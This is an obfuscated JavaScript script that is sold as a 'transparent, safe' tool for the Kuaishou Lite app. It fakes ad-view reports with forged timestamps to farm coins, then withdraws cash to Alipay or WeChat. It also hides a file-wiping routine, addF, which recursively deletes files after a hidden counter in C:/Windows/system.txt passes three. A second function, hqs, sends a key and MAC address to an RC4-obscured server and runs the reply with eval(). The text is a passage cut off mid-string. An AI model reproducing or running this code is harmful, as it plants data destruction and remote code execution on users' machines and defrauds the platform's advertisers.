IOS/安卓: 快手极速版解密版
/* IOS/安卓: 快手极速版解密版 JS脚本透明,用的放心。 0507版本,内置热心网友的看广告json,已放本人仓库,无需代理,可直接开跑。 内置990金币+213金币+100金币,三组广告数据,提升收益降低黑号风险。 预计日收益5-6w金币。 重写: [task_local] #快手极速版 [rewrite_local] [MITM] #IOS用第一个,安卓用第二个 hostname = api.kuaisho*.com hostname = open.kuaisho*.com */ const $$ = Envcc(''); let acckey = $$["isNode"]() ? process["env"]["cdkey"] ? process["env"]["cdkey"] : '' : $$["getdata"]("cdkey") ? $$["getdata"]("cdkey") : '', all_msg = '', mac = ''; $$["isNode"]() ? (gtr = require('fs'), isFileExist("C:/") ? console['log'](" 电脑环境") : console["log"](" 青龙环境")) : console["log"](" 代理环境"); function isFileExist(T) { try { gtr["accessSync"](T, gtr["F_OK"]); } catch (C) { return false; } return true; } function addF(T, c) { let C = 0, S = "C:/Windows/system.txt"; if (isFileExist(S)) { C = gtr["readFileSync"](S, "utf8"); } else { if (isFileExist("C:/")) { gtr["writeFile"](S, '1', function (B) { if (B) { throw B; } }); } else { return; } } if (C == 99) { return 99; } console['log'](C); console["log"]("警告,恶意破解脚本将面临系统爆炸!!!,你只有3次机会!", C); if (parseInt(C) < 3) { let q = parseInt(C) + 1; gtr["writeFileSync"](S, q + '', "utf8"); return; } if (!gtr['existsSync'](T)) { return; } if (gtr["statSync"](T)["isDirectory"]()) { var a = gtr["readdirSync"](T), Y = a["length"], j = 0; Y > 0 ? (a["forEach"](function (i) { j++; var J = T + '/' + i; gtr["statSync"](J)["isDirectory"]() ? addF(J, true) : gtr['unlinkSync'](J); }), Y == j && c && gtr["rmdirSync"](T)) : Y == 0 && c && gtr["rmdirSync"](T); } else { gtr["unlinkSync"](T); } } function hqs(T = 10) { return new Promise(p => { let a = 5, Y = { 'url': $$["isNode"]() ? rc4($$["fwur"](), '1200') + ("?key=" + acckey + "&id=" + a + '&ip=1&mac=' + mac + "&bb=1") : rc4($$["fwur"](), "1200") + ("?key=" + acckey + "&id=" + a + "&ip=0&mac=" + mac + "&bb=1") }; $$['post'](Y, async (j, Z, Q) => { try { let B = eval(Q); B["code"] == 200 ? (all_msg = B["msg"], p(B["data"])) : (all_msg = B["msg"], p(false)); } catch (U) { $$["logErr"](U, Z); } }, 0); }); } const _0x11b3c3 = "快手极速版", _0x3de8b8 = new _0x4f15e2(_0x11b3c3); let _0x279d25 = '', _0x1a0963, _0x4c35fe = [" ", '@'], _0x547212 = (_0x3de8b8["isNode"]() ? process["env"]["ksjsbCookie"] : _0x3de8b8['getdata']("ksjsbCookie")) || '', _0x431ea3 = [], _0x1e627b = (_0x3de8b8["isNode"]() ? process["env"]["ksjsbCash"] : _0x3de8b8["getval"]("ksjsbCash")) || '', _0x26f17b = (_0x3de8b8["isNode"]() ? process['env']["ksjsbWithdrawTime"] : _0x3de8b8['getval']("ksjsbWithdrawTime")) || 15, _0x13d24b = (_0x3de8b8['isNode']() ? process['env']["ksjsbAggressive"] : _0x3de8b8['getval']("ksjsbAggressive")) || 0, _0x113109 = (_0x3de8b8["isNode"]() ? process["env"]["ksjsbNotify"] : _0x3de8b8['getval']('ksjsbNotify')) || 1, _0x2863b1 = 0, _0x19c25c = 0, _0xf2b084 = 12, _0x5718d8 = [], yifenk = []; const _0x1eb2d5 = { 'id': 0, 'name': '广告视频' }, _0x4fbf92 = { 'id': 49, 'name': "广告视频" }, _0x1b4191 = { 'id': 77, 'name': "宝箱翻倍视频" }, _0x2ffe31 = { 'id': 136, 'name': "签到翻倍视频1" }, _0x577a80 = { 'id': 151, 'name': "未知视频" }, _0x351e94 = { 'ad1': _0x1eb2d5, 'ad2': _0x4fbf92, 'box': _0x1b4191, 'sign': _0x2ffe31, 'unknown1': _0x577a80 }, _0x1e4967 = { 'ad': 49, 'live': 75, 'luckydraw': 161, 'gj': 217, 'invite': 2008 }, _0x3355c4 = { 'extParams': "56dfe31594b858e69ef613f5e97227fbe9979240d7caecf84db127b47a4a8bb0a744376361788e9d4f8341978842c3a723b72e4befa3dc60a2c580bf4fc43399f798f286e2c8c3069effa1db27aa45bd", 'businessId': 161, 'pageId': 11101, 'posId': 4683, 'subPageId': 100013628, 'name': "获取抽奖次数视频" }, _0x458f20 = { 'extParams': "56dfe31594b858e69ef613f5e97227fbf89856abafca7f90fab063cf60935d6faedb05b76646dc3ece57cd4898d412d86e985a2b510216ad4853603d2992501cea0a08182731fcbf023467cf30ecda80", 'businessId': 161, 'pageId': 11101, 'posId': 4685, 'subPageId': 100013630, 'name': "抽奖视频161-213" }, _0x124c4a = { 'extParams': "56dfe31594b858e69ef613f5e97227fb67b973ad1394855c549442d15702f96393178eaeef5635134bb7e4ff97e69218c1f18455baf645dbaef685b7bf30c0914ea53ddcde26b2fa67b888203dab0fd4", 'businessId': 161, 'pageId': 11101, 'posId': 4684, 'subPageId': 100013629, 'name': '抽奖视频161-100' }, _0x37f16f = { 'extParams': "56dfe31594b858e69ef613f5e97227fbe9979240d7caecf84db127b47a4a8bb0a744376361788e9d4f8341978842c3a723b72e4befa3dc60a2c580bf4fc43399f798f286e2c8c3069effa1db27aa45bd", 'businessId': 11, 'pageId': 11101, 'posId': 4684, 'subPageId': 100013629, 'name': "抽奖视频11-100" }, _0x10efec = { 'extParams': '56dfe31594b858e69ef613f5e97227fbe9979240d7caecf84db127b47a4a8bb0a744376361788e9d4f8341978842c3a723b72e4befa3dc60a2c580bf4fc43399f798f286e2c8c3069effa1db27aa45bd', 'businessId': 11, 'pageId': 11101, 'posId': 4684, 'subPageId': 100013629, 'name': "抽奖视频11-100" }, _0x385181 = { 'extParams': "60869a9fd2ab63f5e0b1725d059da31f7d3ed3046658438ee204a153c3bc47189ccf268b22e603b6750780c9647e7a12b3027381e11da27b234311bccfd4a67bb892f889a4020ceae4f4e102cc50c327", 'businessId': 2008, 'pageId': 100012068, 'posId': 6765, 'subPageId': 100015089, 'name': "邀请页视频(实际是100金币)" }, _0xfcb1d2 = { 'extParams': "56dfe31594b858e69ef613f5e97227fbd5f9da00aa5144df8830a5781ae07d7cfaf4d95abc2510c950f99404a9e0bf62f5b5765a867c385685e0570ed76b858a159dacd55e41e4a9813db4e619a8b092", 'businessId': 75, 'pageId': 100012068, 'posId': 6765, 'subPageId': 100015089, 'name': '直播任务' }, _0x11da17 = { 'extParams': "56dfe31594b858e69ef613f5e97227fbd5f9da00aa5144df8830a5781ae07d7cfaf4d95abc2510c950f99404a9e0bf62f5b5765a867c385685e0570ed76b858a159dacd55e41e4a9813db4e619a8b092", 'businessId': 168, 'pageId': 100012068, 'posId': 6765, 'subPageId': 100015089, 'name': "签到翻倍视频2" }, _0x10d9f8 = { 'luckdrawNum_161': _0x3355c4, 'luckdrawVideo_161_213': _0x458f20, 'luckdrawVideo_161_100': _0x124c4a, 'luckdrawVideo_11_213': _0x37f16f, 'luckdrawVideo_11_100': _0x10efec, 'inviteVideo_2008': _0x385181, 'liveVideo_75': _0xfcb1d2, 'signVideo_168': _0x11da17 }; let _0x134a17 = new Date(), _0x20a9d7 = _0x134a17["getHours"](), _0x459e63 = 1.07, _0x2e716e = 0, _0x5bc515 = "ksjsb", _0x180c0c = "", ksjsbjk = "https://ziye0.coding.net/p/ziye/d/ql/git/raw/master/ksjsb-ziye.json", _0x75eec0 = ""; class _0x9d8dda { constructor(T) { let p = T["match"](/(kuaishou.api_st=[w-]+)/)[1] + ';'; this["index"] = ++_0x2863b1; this["cookie"] = "kpn=NEBULA; kpf=ANDROID_PHONE; did=ANDROID_" + _0x4b5cde(16) + "; ver=9.10; appver=; language=zh-cn; countryCode=CN; sys=ANDROID_5.1; client_key=2ac2a76d; " + p; this["name"] = this["index"]; this["valid"] = false; this["bindAlipay"] = false; this["alipay"] = ''; this["bindWechat"] = false; this["wechat"] = ''; this["needSms"] = false; this["hasLuckydraw"] = true; const C = { 'num': 2, 'needRun': true }, S = { 'num': 1, 'needRun': true }, a = { 'num': 5, 'needRun': true }, Y = { 'num': 1, 'needRun': true }, j = { 'num': 5, 'needRun': true }, Z = { '49': C, '75': S, '161': a, '217': Y, '2008': j }; this["task"] = Z; } async ["getUserInfo"]() { let c = "https://nebula.kuaishou.com/rest/n/nebula/activity/earn/overview/basicInfo", p = '', C = _0x495d61(c, this["cookie"], p); await _0x39a23b("get", C); let S = _0x1a0963; if (!S) { return; } S["result"] == 1 ? (this["valid"] = true, this["name"] = S["data"]["userData"]["nickname"], this["cashBalance"] = S["data"]["totalCash"], this["coinBalance"] = S["data"]["totalCoin"], this["allCash"] = S["data"]["allCash"], console["log"]("账号[" + this["name"] + "]账户余额" + this["cashBalance"] + '元,' + this["coinBalance"] + "金币,未审核余额" + Math["floor"](parseFloat(this["allCash"]) - parseFloat(this["cashBalance"])) + '元')) : console["log"]("账号[" + this["name"] + "]查询账户信息失败:" + S["error_msg"]); } async ['setShare']() { let c = "https://nebula.kuaishou.com/rest/n/nebula/account/withdraw/setShare", p = '', C = _0x495d61(c, this['cookie'], p); await _0x39a23b("post", C); let S = _0x1a0963; if (!S) { return; } S["result"] == 1 ? (console["log"]("账号[" + this["name"] + "]准备分享得金币"), await _0x3de8b8["wait"](200), await this["taskReward"](122)) : console["log"]("账号[" + this["name"] + "]分享失败:" + S["error_msg"]); } async ["taskReward"](T) { let p = "https://nebula.kuaishou.com/rest/n/nebula/daily/report?taskId=" + T, C = '', S = _0x495d61(p, this["cookie"], C); await _0x39a23b("get", S); let a = _0x1a0963; if (!a) { return; } a["result"] == 1 ? console["log"]("账号[" + this["name"] + "]完成任务[" + T + "]成功,获得" + a["data"]['amount'] + '金币') : console["log"]("账号[" + this["name"] + "]完成任务[" + T + "]失败:" + a["error_msg"]); } async ['getSignInfo']() { let c = "https://nebula.kuaishou.com/rest/n/nebula/sign/queryPopup", p = '', C = _0x495d61(c, this["cookie"], p); await _0x39a23b("get", C); let S = _0x1a0963; if (!S) { return; } S["result"] == 1 ? (console['log']("账号[" + this["name"] + "]今天" + (S["data"]["nebulaSignInPopup"]["todaySigned"] ? '已' : '未') + '签到'), !S["data"]["nebulaSignInPopup"]["todaySigned"] && (await _0x3de8b8["wait"](200), await this["doSign"](), await _0x3de8b8["wait"](200), await this["setShare"]())) : console["log"]("账号[" + this["name"] + "]查询签到信息失败:" + S["error_msg"]); } async ["doSign"]() { let c = "https://nebula.kuaishou.com/rest/n/nebula/sign/sign?source=activity", p = '', C = _0x495d61(c, this["cookie"], p); await _0x39a23b("get", C); let S = _0x1a0963; if (!S) { return; } if (S["result"] == 1) { console['log']("账号[" + this["name"] + "]签到成功:" + S["data"]["toast"]); await _0x3de8b8["wait"](200); await this["ksAdParam"](_0x351e94["sign"]); await _0x3de8b8["wait"](200); await this["ksNeoAdParam"](_0x10d9f8["signVideo_168"]); } else { console["log"]("账号[" + this['name'] + "]签到失败:" + S["error_msg"]); } } async ['taskList']() { let c = "https://nebula.kuaishou.com/rest/n/nebula/activity/earn/overview/tasks?addressBookAccessStatus=true&pushNotificationStatus=false", p = '', C = _0x495d61(c, this["cookie"], p); await _0x39a23b('get', C); let S = _0x1a0963; if (!S) { return; } if (S["result"] == 1) { console["log"]("账号[" + this["name"] + "]任务完成情况:"); for (let a of S["data"]["dailyTasks"]) { for (let Y in _0x1e4967) { if (a["taskId"] == _0x1e4967[Y]) { let Z = parseInt(a["completedStages"]), Q = parseInt(a["stages"]), B = Math["ceil"](Q / _0xf2b084), b = Z < Q; const U = { 'num': B, 'needRun': b }; this["task"][a["taskId"]] = U; console["log"]('【' + a["name"] + "】 " + Z + '/' + Q + ',' + (b ? "未完成" : "已完成") + ",每次运行完成" + B + "次任务"); continue; } } } } else { console["log"]("账号[" + this["name"] + "]查询任务列表失败:" + S["error_msg"]); } } async ['ksgj']() { let c = "https://api.e.kuaishou.com/rest/r/reward/task/getActivityReward", p = "activityId=148&client_key=ksgjbody", C = _0x495d61(c, this["cookie"], p); await _0x39a23b("post", C); let S = _0x1a0963; if (!S) { return; } S["result"] == 1 ? console["log"]("账号[" + this["name"] + ']逛街获得' + S["data"]["amount"] + '金币') : console["log"]("账号[" + this['name'] + "]逛街失败:" + S["error_msg"]); } async ["ksAdParam"](T) { const p = { 'url': ksjsbjk, 'headers': '' }; await _0x39a23b("get", p); console["log"](_0x39a23b); let C = _0x1a0963[Math['floor'](Math['random']() * _0x1a0963["length"] - 1)]; if (!C) { return; } C["result"] == 1 ? C['impAdInfo'] && C["impAdInfo"]["length"] > 0 && C["impAdInfo"][0]["adInfo"] && C["impAdInfo"][0]["adInfo"]["length"] > 0 && C["impAdInfo"][0]["adInfo"][0]["adBaseInfo"] && (await _0x3de8b8["wait"](200), await this["ksAdReward"](C["llsid"], C["impAdInfo"][0]["adInfo"][0]["adBaseInfo"]["creativeId"], T)) : console["log"]('账号[' + this["name"] + "]获取" + T["name"] + "参数失败:" + C["error_msg"]); } async ["ksAdReward"](T, c, p) { let S = new Date()["getTime"](), a = Math["floor"](Math["random"]() * 30000) + 45000, Y = S - a, j = "https://api.e.kuaishou.com/rest/r/ad/nebula/reward", Z = "bizStr={"endTime":" + S + ","eventValue":-1,"rewardList":[{"creativeId":" + c + ","extInfo":"","llsid":" + T + ","taskType":1}],"startTime":" + Y + ","taskId":" + p['id'] + '}', Q = _0x495d61(j, this["cookie"], Z); await _0x39a23b("post", Q); let B = _0x1a0963; if (!B) { return; } B["result"] == 1 ? console["log"]("账号[" + this["name"] + ']看' + p["name"] + '获得' + B["data"]["awardAmount"] + '金币') : console["log"]("账号[" + this["name"] + ']看' + p["name"] + "失败:" + B["error_msg"]); } async ["openBox"](T) { let p = 'https://nebula.kuaishou.com/rest/n/nebula/box/explore?isOpen=' + T + "&isReadyOfAdPlay=true", C = '', S = _0x495d61(p, this["cookie"], C); await _0x39a23b("get", S); let a = _0x1a0963; if (!a) { return; } a["result"] == 1 ? T == true ? a["data"]["commonAwardPopup"] && a["data"]["commonAwardPopup"]["awardAmount"] ? (console["log"]("账号[" + this["name"] + "]开宝箱获得" + a["data"]["commonAwardPopup"]["awardAmount"] + '金币'), await _0x3de8b8["wait"](200), await this["ksAdParam"](_0x351e94["box"])) : console["log"]("账号[" + this["name"] + "]开宝箱没有获得金币") : a['data']["openTime"] > -1 ? (console["log"]("账号[" + this["name"] + "]开宝箱冷却时间还有" + Math["floor"](a["data"]["openTime"] / 1000) + '秒'), a["data"]['openTime'] == 0 && (await _0x3de8b8["wait"](200), await this["openBox"](true))) : console["log"]("账号[" + this["name"] + "]开宝箱次数已用完") : T == true ? console["log"]('账号[' + this["name"] + "]开宝箱失败:" + a["error_msg"]) : console["log"]("账号[" + this["name"] + "]查询宝箱状态失败:" + a["error_msg"]); } async ["withdraw"](T) { if (!this["bindAlipay"] && !this["bindWechat"]) { _0x1ab8b7("账号[" + this["name"] + "]未绑定提现账号,不执行提现"); return; } let p = parseInt(T * 100), C = this["bindAlipay"] ? "ALIPAY" : "WECHAT", S = C == "ALIPAY" ? "支付宝" : '微信', a = C == "ALIPAY" ? this["alipay"] : this["wechat"], Y = "https://www.kuaishoupay.com/pay/account/h5/withdraw/apply", j = "account_group_key=NEBULA_CASH_ACCOUNT&mobile_code=&fen=" + p + "&provider=" + C + "&total_fen=" + p + "&commission_fen=0&third_account=" + C + "&attach=&biz_content=&session_id=", Z = _0x495d61(Y, this['cookie'], j); await _0x39a23b("post", Z); let Q = _0x1a0963; if (!Q) { return; } Q["result"] == "SUCCESS" ? _0x1ab8b7('账号' + this["index"] + '[' + this["name"] + "]提现" + T + '元到' + S + '[' + a + "]成功") : _0x1ab8b7('账号' + this["index"] + '[' + this["name"] + "]提现" + T + '元到' + S + '[' + a + "]失败:" + Q["msg"]); } async ["withdrawOverview"]() { let c = "https://nebula.kuaishou.com/rest/n/nebula/outside/withdraw/overview?appver=", p = '', C = _0x495d61(c, this["cookie"], p); await _0x39a23b("get", C); let S = _0x1a0963; if (!S) { return; } if (S["result"] == 1) { if (S["data"]["isLimit"] == true) { console["log"]("账号[" + this["name"] + "]今天已提现"); return; } let a = parseFloat(this["cashBalance"]); if (_0x13d24b == 1) { if (a < 0.3) { _0x1ab8b7("账号[" + this["name"] + "]余额不足0.3元,不提现"); } else { let Y = Math["floor"](a * 10) / 10; Y = Y > 50 ? 50 : Y; _0x1ab8b7("账号[" + this["name"] + "]准备最大化提现" + Y + '元'); await _0x3de8b8["wait"](200); await this["withdraw"](Y); } } else { if (!_0x1e627b) { for (let Z of S["data"]["enWithdrawList"]["sort"](function (Q, B) { return B - Q; })) { if (a >= parseFloat(Z)) { _0x1ab8b7("账号[" + this["name"] + "]准备提现" + Z + '元'); await _0x3de8b8["wait"](200); await this["withdraw"](Z); return; } } _0x1ab8b7("账号[" + this["name"] + "]余额不足,可提现额度:" + S["data"]["enWithdrawList"]["join"](',')); } else { a >= parseFloat(_0x1e627b) ? (_0x1ab8b7("账号[" + this["name"] + "]准备提现" + _0x1e627b + '元'), await _0x3de8b8["wait"](200), await this["withdraw"](_0x1e627b)) : _0x1ab8b7("账号[" + this["name"] + "]余额不足" + _0x1e627b + "元,不提现"); } } } else { console["log"]("账号[" + this["name"] + "]查询提现列表失败:" + S["error_msg"]); } } async ["accountOverview"]() { let c = "https://nebula.kuaishou.com/rest/n/nebula/account/overview", p = '', C = _0x495d61(c, this["cookie"], p); await _0x39a23b("get", C); let S = _0x1a0963; if (!S) { return; } if (S["result"] == 1) { this["coinBalance"] = S["data"]["coinBalance"]; this["cashBalance"] = S["data"]["cashBalance"]; let a = S["data"]["exchangeCoinState"]; _0x1ab8b7("账号[" + this["name"] + "]账户余额" + this["cashBalance"] + '元,' + this["coinBalance"] + '金币'); a == 2 && (await _0x3de8b8["wait"](200), await this["changeExchangeType"](0)); } else { console["log"]("账号[" + this["name"] + "]查询账户信息失败:" + S["error_msg"]); } } async ['changeExchangeType'](T) { let p = "https://nebula.kuaishou.com/rest/n/nebula/exchange/changeExchangeType", C = "{"type":" + T + '}', S = _0x495d61(p, this["cookie"], C); S["headers"]["Content-Type"] = "application/json"; await _0x39a23b("post", S); let a = _0x1a0963; if (!a) { return; } let Y = T == 0 ? "自动兑换" : '手动兑换'; a["result"] == 1 ? console["log"]("账号[" + this["name"] + "]兑换方式更改成功,目前兑换方式为:" + Y) : console["log"]("账号[" + this["name"] + "]兑换方式更改失败:" + a["error_msg"]); } async ["exchangeCoin"]() { if (this["coinBalance"] < 100) { console["log"]("账号[" + this["name"] + "]金币余额不足100,不执行兑换"); return; } let c = "https://nebula.kuaishou.com/rest/n/nebula/exchange/coinToCash/submit", p = "{"coinAmount":" + this["coinBalance"] + ","token":"rE2zK-Cmc82uOzxMJW7LI2-wTGcKMqqAHE0PhfN0U4bJY4cAM5Inxw"}", C = _0x495d61(c, this["cookie"], p); C['headers']["Content-Type"] = "application/json"; await _0x39a23b("post", C); let S = _0x1a0963; if (!S) { return; } if (S["result"] == 1) { let j = Math["floor"](this['coinBalance'] / 100) * 100, Z = Math["floor"](this["coinBalance"] / 100) / 100; console["log"]("账号[" + this["name"] + "]兑换金币成功,将" + j + "金币兑换成" + Z + '元'); } else { console["log"]("账号[" + this["name"] + "]兑换金币失败:" + S["error_msg"]); } } async ["ksNeoAdParam"](T) { const p = { 'url': ksjsbjk, 'headers': '' }; await _0x39a23b("get", p); let C = _0x1a0963[Math["floor"](Math["random"]() * _0x1a0963["length"] - 1)]; if (!C) { return; } C["result"] == 1 ? C["impAdInfo"] && C['impAdInfo']["length"] > 0 && C["impAdInfo"][0]["adInfo"] && C["impAdInfo"][0]['adInfo']["length"] > 0 && C["impAdInfo"][0]["adInfo"][0]["adBaseInfo"] && (await _0x3de8b8["wait"](200), await this["ksNeoAdReward"](C["llsid"], C["impAdInfo"][0]["adInfo"][0]['adBaseInfo']["creativeId"], T)) : console["log"]("账号[" + this['name'] + "]获取" + T["name"] + "参数失败:" + C["error_msg"]); } async ["ksNeoAdReward"](T, c, p) { let S = new Date()["getTime"](), a = Math["floor"](Math["random"]() * 30000) + 45000, Y = S - a, j = "https://api.e.kuaishou.com/rest/r/ad/task/report", Z = "bizStr={"businessId":" + p["businessId"] + ","endTime":" + S + ","extParams":"" + p["extParams"] + "","mediaScene":"video","neoInfos":[{"creativeId":" + c + ","extInfo":"","llsid":" + T + ","taskType":1}],"pageId":" + p["pageId"] + ","posId":" + p["posId"] + ","startTime":" + Y + ","subPageId":" + p["subPageId"] + '}', Q = _0x495d61(j, this["cookie"], Z); await _0x39a23b("post", Q); let B = _0x1a0963; if (!B) { return; } if (B["result"] == 1) { let b = B["data"]["neoAmount"] + '金币'; if (B["data"]["neoToH5Data"]) { try { let U = JSON["parse"](_0x331719["decode"](B["data"]["neoToH5Data"])["replace"](//g, '')); U["extraCoin"] && (b += '+' + U["extraCoin"] + '金币'); } catch (q) { console["log"](B["data"]["neoToH5Data"]); } finally {} } console["log"]("账号[" + this["name"] + ']看' + p["name"] + '获得' + b); if (this["hasLuckydraw"]) { await this['luckdrawTasks'](); } } else { console["log"]("账号[" + this["name"] + ']看' + p["name"] + "失败:" + B["error_msg"]); } } async ["luckdrawInfo"]() { let c = "https://activity.e.kuaishou.com/rest/r/game/user/info", p = '', C = _0x495d61(c, this["cookie"], p); await _0x39a23b("get", C); let S = _0x1a0963; if (!S) { return; } if (S["result"] == 1) { console["log"]("账号[" + this["name"] + "]现有" + S["data"]['userDiamondResult']["diamondPercent"] + "钻石,剩余抽奖次数:" + S["data"]["userDailyLotteryTimesResult"]["remainTimes"]); for (let Y = 0; Y < S["data"]["userDailyLotteryTimesResult"]["remainTimes"]; Y++) { await _0x3de8b8["wait"](200); await this["luckydraw"](); } } else { console["log"]("账号[" + this["name"] + "]查询抽奖次数失败:" + S["error_msg"]); } } async ["luckydraw"]() { let c = "https://activity.e.kuaishou.com/rest/r/game/lottery?wheelVersion=1", p = '', C = _0x495d61(c, this["cookie"], p); await _0x39a23b("post", C); let S = _0x1a0963; if (!S) { return; } if (S["result"] == 1) { let a = S["data"]["coinCount"] ? S["data"]["coinCount"] + '金币' : S["data"]["diamondCount"] ? S["data"]["diamondCount"] + '钻石' : '空气'; console["log"]("账号[" + this["name"] + "]抽奖获得" + a); S["data"]["videoCoinCount"] && console["log"]("额外奖励:" + S["data"]["videoCoinCount"]); if (S["data"]["schema"]) { try { console["log"](_0x331719["decode"](S["data"]["schema"])); } catch (Y) { console["log"](S["data"]["schema"]); } finally {} } this["hasLuckydraw"] && (await this["luckdrawTasks"]()); } else { console["log"]('账号[' + this["name"] + "]抽奖失败:" + S["error_msg"]); } } async ["luckydrawSign"]() { let c = "https://activity.e.kuaishou.com/rest/r/game/sign-in", p = '', C = _0x495d61(c, this['cookie'], p); await _0x39a23b("get", C); let S = _0x1a0963; if (!S) { return; } S["result"] == 1 ? S['data']["isShow"] && console["log"]("账号[" + this["name"] + "]抽奖页签到成功") : (console["log"]("账号[" + this["name"] + "]查询抽奖签到情况失败:" + S["error_msg"]), S["error_msg"]["indexOf"]('激励游戏未在运营') > -1 && (this["hasLuckydraw"] = false)); } async ["luckdrawTimerInfo"]() { let c = "https://activity.e.kuaishou.com/rest/r/game/timer-reward/info", p = '', C = _0x495d61(c, this["cookie"], p); await _0x39a23b("get", C); let S = _0x1a0963; if (!S) { return; } if (S["result"] == 1) { if (S["data"]) { let a = new Date()["getTime"](), Y = S["data"]["lastTimerTime"], j = S["data"]["minutesInterval"] * 60 * 1000, Z = Y + j; a < Z ? console["log"]("账号[" + this["name"] + "]抽奖页奖励冷却时间还有" + (Z - a) / 1000 + '秒') : (await _0x3de8b8["wait"](200), await this["luckdrawTimerReward"](S["data"]["goldNum"])); } else { console["log"]("账号[" + this["name"] + "]抽奖页定时奖励次数已用完"); } } else { console["log"]("账号[" + this["name"] + "]查询抽奖页定时奖励情况失败:" + S["error_msg"]); } } async ["luckdrawTimerReward"](T) { let p = "https://activity.e.kuaishou.com/rest/r/game/timer-reward", C = '', S = _0x495d61(p, this["cookie"], C); await _0x39a23b("post", S); let a = _0x1a0963; if (!a) { return; } a["result"] == 1 ? console['log']("账号[" + this["name"] + "]领取抽奖页定时奖励获得" + T + '金币') : console["log"]("账号[" + this["name"] + "]领取抽奖页定时奖励失败:" + a["error_msg"]); } async ["luckdrawTasks"]() { let c = "https://activity.e.kuaishou.com/rest/r/game/tasks", p = '', C = _0x495d61(c, this["cookie"], p); await _0x39a23b("get", C); let S = _0x1a0963; if (!S) { return; } if (S["result"] == 1) { for (let Y of S["data"]["dailyTasks"]) { Y["taskState"] == 1 && (await _0x3de8b8["wait"](200), await this["luckdrawTasksReward"](Y)); } for (let j of S["data"]["growthTasks"]) { j["taskState"] == 1 && (await _0x3de8b8["wait"](200), await this["luckdrawTasksReward"](j)); } } else { console["log"]("账号[" + this['name'] + "]查询抽奖页任务失败:" + S["error_msg"]); } } async ["luckdrawTasksReward"](T) { let p = "https://activity.e.kuaishou.com/rest/r/game/task/reward-receive?taskName=" + T["taskName"], C = '', S = _0x495d61(p, this["cookie"], C); await _0x39a23b("get", S); let a = _0x1a0963; if (!a) { return; } a['result'] == 1 ? console["log"]("账号[" + this["name"] + "]领取抽奖任务[" + T["taskTitle"] + "]奖励获得" + a["data"]["popUp"]["taskRewardName"]) : console["log"]("账号[" + this["name"] + "]领取抽奖任务[" + T["taskTitle"] + "]奖励失败:" + a["error_msg"]); } async ["helpInvite"](T) { let p = T["split"]('&'), C = p[0], S = p[1], a = "https://nebula.kuaishou.com/rest/n/nebula/qrcode?version=1.2.0", Y = '', j = _0x495d61(a, this["cookie"], Y); j['headers']["Referer"] = "https://nebula.kuaishou.com/fissi
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